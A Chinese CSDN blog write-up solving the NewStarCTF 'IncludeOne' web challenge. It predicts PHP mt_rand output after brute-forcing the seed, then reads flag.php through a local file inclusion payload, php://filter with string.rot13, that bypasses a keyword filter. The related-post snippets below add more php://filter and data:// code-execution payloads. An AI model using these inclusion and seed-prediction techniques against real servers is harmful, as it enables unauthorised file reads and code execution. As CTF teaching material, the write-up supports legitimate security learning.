CTF之旅WEB篇(4)--NewStarCTF 公开赛IncludeOne详解

最新推荐文章于 2024-05-24 22:45:00 发布
最新推荐文章于 2024-05-24 22:45:00 发布
阅读量798 收藏 2
点赞数 2
分类专栏: CTF 文章标签: 经验分享 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shutTD/article/details/127147238
版权

前言:

在看这篇wp之前首先我们要了解文件包含,php伪协议读取,rot13编码,其具体含义即用法自行上网搜索,在文中不做进一步解释。

一、审题

 扔给了我们一个道具?暂时还不知道这是要干嘛,所以我们进入靶场看看。

进入靶场后发现是一段php代码,好了有到了快乐的审计环节,首先我们看看代码什么意思:

<?php
highlight_file(__FILE__);
error_reporting(0);
include("seed.php");
//mt_srand(*********);
echo "Hint: ".mt_rand()."<br>";
if(isset($_POST['guess']) && md5($_POST['guess']) === md5(mt_rand())){
    if(!preg_match("/base|\.\./i",$_GET['file']) && preg_match("/NewStar/i",$_GET['file']) && isset($_GET['file'])){
        //flag in `flag.php`
        include($_GET['file']);
    }else{
        echo "Baby Hacker?";
    }
}else{
    echo "No Hacker!";
} Hint: 1219893521
No Hacker!

大体观察一下我们最终要的函数是什么,可以看到有一个inclue文件包含且file参数是可控的,因此基本上可以肯定是文件包含的题了,不过这里对file参数做了过滤我们先不管,先看这里有个新奇的东西mt_rand()和注释的mt_srand(),看到这里的时候确实有点懵住了,不过我们好像题目扔给了我们一个工具所以我们先去看看那个网址讲了写啥。(自己仔细看,这里不做解释了)然后我们下载压缩包并把它拖入我们的centos进行解压,命令为:tar -xzf php_mt_seed-4.0.tar.gz。解压缩之后,我们跟着提示进入php_mt_seed-4.0目录下,随之输入提示中的命令time ./php_mt_seed 1219893521,然后可以看到程序已经开跑了

可以看到跑出来几个参数,我们选取第一个1145146(当然也有可能是其他的)作为我们的mt_srand()

二、编写脚本

直接上代码:

<?php

mt_srand(1145146); 
echo mt_rand();
echo mt_rand();

跑出来一串字符串 12198935211202031004,我们取与题目中的出现的字符串不一样的的一串即后面半串1202031004作为guess参数传参,我们试试会不会进入第一个if循环输出Baby Hacker?

我们发现成功进入循环,接下来只要进入第二个if循环就可以读取文件了

三、 伪协议读取源代码

看到include自然而然想到php伪协议读取源代码即:

file=php://filter/read=convert.base64-encode/resource=flag.php

但这里明显过滤了base,且必须含有NewStar字符串,所以我们使用rot13编码进行绕过,并将NewStar字符串嵌入,所以我们的payload为:

file=php://filter/NewStar/read=string.rot13/resource=flag.php

 

 

 得到flag,进行rot13解码即可。

 总结

主要还是考察对新东西的快速理解,还有一些其他的绕过技巧,平时要养成边刷题边把题目里的一些技巧记录下来的好习惯,这样在其他的题目里的绕过才会更得心应手。

shutTD
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
BUUCTFWebInclude(文件包含伪协议)
qq_70434663的博客
03-01 568
进入靶场后习惯的右键查看源码但什么都没有发现,点击“tips”后得到“can you find out the flag?”内容源码也没有什么内容。其实题目已经提示了“include”文件包含漏洞(伪协议)。最后在进行base64解码就可以得到flag了。对于文件包含漏洞大家可以看。
Bugku CTF web4(Web
ChaoYue_miku的博客
02-15 378
0、打开网页,查看PHP源码 $what=$_POST['what']; echo $what; if($what=='flag') echo 'flag{****}'; 用POST方法上传参数what=flag即可 1、使用hackbar,传递post=what 2、得到flag:flag{ca93c192f5ef059ef9855e5cd1107cca}
CTFSHOW—文件包含
灰太的表格的博客
02-04 583
web78 ?file=php://filter/convert.base64-encode/resource=flag.php web79 (php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码 使用方法:data://text/plain;base64,xxxx(base64编码后的数据)) php被过滤使用data伪装协议执行代码 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxh
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
最新发布
2401_84208172的博客
05-24 1208
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议及PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
NewStarCTF 公开赛赛道 第二周学习记录
m0_64815693的博客
10-03 2365
NewStarCTF 公开赛赛道 第二周学习记录
BUUCTF NewStarCTF 2023 WEB题WP
qq_65165505的博客
10-07 2542
NewStarCTF 2023 公开赛web题目wp
NewStarCTF week5 web 部分题解
qq_60829702的博客
10-23 517
[NewStarCTF] Give me your photo PLZ、Unsafe Apache、So Baby RCE Again、BabySSTI_Three解题记录以及心得体会
CTF比赛中的常见题型-适合初学者
08-17
CTF比赛中的常见题型--适合初学者
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
ctf-all-in-one
01-30
ctf-all-in-one
CTF 竞赛入门指南(ctf-all-in-one).pdf
09-07
一、基础;二、工具;三、分类专题;四、技巧;五、高级;六、题解;七、实战... 2000多页的电子书,讲解细致,值得搜藏。
NewStarCTF 2023 WEEK1 Crypto
qq_63577068的博客
10-02 605
key=16*8*2=256bit,iv=16*8=128bit,256^128bit说明key的高位128bit不变,所以通过xor高128bit得到高位key的值*2还原key,iv=key^xor^1。每一个明文异或key,得到密文。最主要是要知道key值,就能逆推明文,一种就是,已知明文头是“flag”,用0xe9^ord("f"),0xe3^ord("l")得到key=143。凯撒密码,已知flag的头,kqfl->flag 相当于向前移动5位,key=5,得到。Brainfuck解密。
iwebsec靶场 文件包含漏洞通关笔记9-file://伪协议利用
mooyuan的博客
09-14 375
file协议也叫本地文件传输协议 ,主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件或者通过右键单击‘打开’一样。基本的格式:file:///文件路径。
CTFHub靶场:文件包含
NSQ0207的博客
07-28 185
题目告诉说flag不能直接被包含,但是下面有一个shell.txt,密码是。如果文件名前六个如果是:php://则执行include包含函数。所以我们直接使用 php://filter。
[NewStarCTF 2023] web题解
rev1ve的博客
10-16 1万+
分析一下,第一个if语句判断条件为上传的password参数的MD5值前六位为c4d038;和反引号去绕过对system函数的过滤,反斜杠绕过flag,tac替换cat命令。(多次尝试,发现回显的位置在5而不是1,开始卡了很久没回显)简单的文件包含,这里过滤了常见的转换过滤器base和rot。打开题目,发现是小游戏(题目跟最近打的SHCTF比较像)我们丢到重放器,发现是页面302状态,并且出现了提示。(这里用XFF不行,我用的是X-Real-IP)打开题目,提示我们传参两个数,然后帮我们计算。
全!CTF靶场、渗透实战靶场总结 (适合收藏)
热门推荐
Appleteachers的博客
05-20 3万+
CTF靶场、渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门、提升自己、丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯); 渗透实战靶场:挖洞、渗透实战(web、域、横向渗透),适合实战能力需要大幅度提升的同学。 目录 ▶0x01 CTF赛事发布网站 ▶0x02 CTF在线靶场 ▶0x03 漏洞靶场(本地搭建) ▶0x04 渗透实战靶场 0x01 CTF赛事发布网站 i春秋和XCTF社区经常会发布各类CTF赛事 i春秋: https://www.
BUUCTF NewStarCTF 公开赛赛道Week2 Writeup
末初的CSDN博客
10-03 2315
BUUCTF NewStarCTF 公开赛赛道Week2 Writeup
BugKu-CTF(杂项misc)--easypicture/TLS
Nailaoyyds的博客
05-13 1117
目录 题解: 工具爆破压缩包密码 ​编辑 拿到密码0707 zsteg拿到密文 拿到flag 题解: 拿到一张图片 fostmore分解(普通图片不会有这么大kb的) 得到一张图片和一个压缩包 工具爆破压缩包密码 拿到密码0707 hint:你喝过咖啡吗?你见过彩色的图片吗?,这里其实提示的是stegsolve, 但是我用的是zsteg剖析ciphertext 拿到一串密文 zsteg拿到密文 AES解密:rcPr04H36Qj+......
ctf工具之binwalk--windows下(misc).rar
07-30
binwalk是一款用于分析和提取嵌入在二进制文件中的文件和数据的工具。对于CTF比赛来说,binwalk可以帮助我们进行文件的分析和提取,从而更好地理解题目并解决问题。 在Windows下使用binwalk,我们首先需要在官方网站(https://github.com/ReFirmLabs/binwalk)下载并安装binwalk的Windows版本。安装完成后,我们可以在命令行中使用binwalk命令进行操作。 拿到CTF题目中的misc.rar文件后,我们可以使用binwalk来分析该文件。在命令行中,我们输入以下命令: binwalk misc.rar binwalk会对该文件进行分析,并将分析结果显示在命令行中。它会检测并提取出文件中的隐藏信息,并尝试识别文件中可能存在的其他类型文件(如图像、压缩包等)。 除了显示分析结果外,binwalk还支持提取文件中的隐藏文件。我们可以使用以下命令来提取隐藏文件: binwalk -e misc.rar 这会将隐藏在misc.rar中的文件提取到当前目录中。我们可以通过查看提取出的文件来获得进一步的线索或解答。 总之,binwalk是一款强大的CTF工具,它可以帮助我们分析和提取嵌入在二进制文件中的文件和数据。在Windows下使用binwalk可以通过命令行进行操作,从而更好地解决CTF比赛中的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shutTD

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值